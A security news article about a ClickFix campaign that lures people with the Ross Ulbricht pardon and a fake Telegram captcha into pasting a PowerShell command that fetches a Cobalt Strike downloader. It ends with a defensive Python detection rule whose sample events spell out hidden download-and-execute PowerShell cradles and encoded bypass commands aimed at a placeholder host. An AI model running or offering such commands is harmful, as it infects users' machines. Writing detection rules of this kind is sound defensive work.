
This attack was first spotted by VX-Underground researchers; it is a new variant of the ClickFix (also known as ClearFake or OneDrive Pastejacking) attack vector. Various ClickFix modifications are common nowadays. Typically, victims are lured to fraudulent websites and talked into running malicious PowerShell commands themselves, thus manually infecting their systems with malware. For instance, attackers ask users to pass a fake CAPTCHA test or a "verification" procedure, allegedly to fix a display problem or to join a channel.
Currently, the attackers are exploiting the recent news that US President Donald Trump has pardoned Ross Ulbricht, founder of the darknet marketplace Silk Road, which was shut down in 2013.
Scammers use fake X (formerly Twitter) accounts to impersonate the Free Ross movement and direct users to supposedly official Ulbricht Telegram channels.

After clicking on such a link, victims are prompted to pass a verification test called Safeguard Captcha.

This Telegram "verification" app automatically copies a PowerShell command to the victim's clipboard, and the user is then prompted to open the Windows Run dialog (Win+R), paste the command and execute it to pass authentication.

According to Bleeping Computer, the code from the clipboard downloads and executes a PowerShell script that, in turn, downloads a ZIP archive from the openline[.]cyou website. This archive contains multiple files, including identity-helper.exe, which, according to VirusTotal, is a Cobalt Strike downloader.
Security experts remind users that under no circumstances should they run commands copied from the Internet in the Windows Run dialog or in a PowerShell terminal, especially if they do not understand what the command does; any obfuscation in such a command should be treated as an alarm signal.
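As an added defensive example (not code from the original article or from the researchers it cites), the following Python rule turns the chain described above into a detection over process-creation events: a PowerShell started by explorer.exe, which is the parent of anything launched from the Run dialog, combined with a download cradle, in-memory execution or obfuscation switches. The events, the URL and the encoded string are constructed samples; placeholder.invalid is a reserved placeholder domain, not an indicator from this incident.

```python
import re

# Constructed Sysmon Event ID 1 style events; placeholder.invalid is a reserved placeholder domain.
SAMPLE_EVENTS = [
    {  # pasted into the Run dialog: explorer.exe spawns a hidden download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (iwr -UseBasicParsing http://placeholder.invalid/s.ps1)"',
    },
    {  # Base64-encoded command line, also launched from the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -ep bypass -enc SQBFAFgAIAAoAC4ALgAuACkA",
    },
    {  # benign: an admin opens an interactive shell from the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell",
    },
    {  # same cradle text under a service parent: not the ClickFix shape, other rules apply
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -c "iwr http://placeholder.invalid/u.ps1 | iex"',
    },
]

# Indicators derived from the chain described above: fetch a script, run it in memory, hide or obfuscate it.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|"
        r"DownloadFile|Net\.WebClient|Start-BitsTransfer)\b", re.I),
    "exec_from_memory": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I),
}
RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.I)  # Win+R launches run under explorer.exe
SHELL_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)

def classify_event(event):
    """Return matched indicators and whether the event has the ClickFix shape: an interactive
    user (parent explorer.exe) launching a shell with a cradle or obfuscation switch."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"]))
    interactive = bool(RUN_DIALOG_PARENT.search(event["ParentImage"]))
    is_shell = bool(SHELL_IMAGE.search(event["Image"]))
    return {"clickfix": interactive and is_shell and bool(hits), "indicators": hits}

def scan(events):
    return [i for i, ev in enumerate(events) if classify_event(ev)["clickfix"]]
```

The parent-process check is what keeps scheduled tasks and management agents that legitimately pull scripts out of this rule; they need their own baseline.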
